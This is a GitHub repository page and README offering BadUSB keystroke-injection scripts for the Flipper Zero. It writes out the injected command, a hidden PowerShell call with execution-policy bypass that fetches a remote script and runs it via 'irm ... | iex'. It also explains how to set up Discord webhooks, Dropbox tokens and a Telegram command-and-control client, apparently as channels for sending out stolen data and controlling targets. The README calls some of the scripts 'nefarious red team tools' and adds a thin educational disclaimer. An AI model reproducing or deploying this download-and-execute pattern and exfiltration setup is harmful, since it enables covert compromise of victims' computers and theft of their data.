Files
BadUSB-Files-For-FlipperZero/Fast-Execution-Scripts
2023-08-30 14:28:46 +01:00
..
2023-07-19 14:57:57 +00:00
2023-07-27 09:27:48 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-08-06 11:12:59 +00:00
2023-08-06 11:12:59 +00:00
2023-07-17 15:43:57 +00:00
2023-08-06 13:05:33 +00:00
2023-07-22 16:16:14 +00:00
2023-08-23 16:57:32 +01:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00
2023-07-17 15:43:57 +00:00

Downloadable-Fast-Execution-Scripts-For-FlipperZero

Easy to setup with tutorials for web hooks etc below...

THESE SCRIPTS DOWNLOAD AND RUN FROM THIS REPO (Parent .ps1 scripts)-

https://github.com/beigeworm/assets/tree/main/Scripts

They use this cmd > STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex

These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!

If you want to learn more about the code, or modify them, most of these scripts are in powershell format here

https://github.com/beigeworm/Powershell-Tools-and-Toys

Pre-Deployment Setup

Most of these scripts will require some setup before they will work.

eg. replace DISCORD_WEBHOOK to your webhook. etc..

Setup for Telegram, Discord, Dropbox

DROPBOX ACCESS TOKEN SETUP

  1. make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app)
  2. generate an access token for your app.

DISCORD WEBHOOK SETUP

  1. (Server Admin Required) On a discord server chat goto > "edit channel" > "integrations" > "webhooks"
  2. make a new webhook, name it and then click "copy webhook URL".

TELEGRAM C2 CLIENT

  1. visit https://github.com/beigeworm/Powershell-Tools-and-Toys/tree/main/Command-and-Control for more info

If you like my work please leave a star.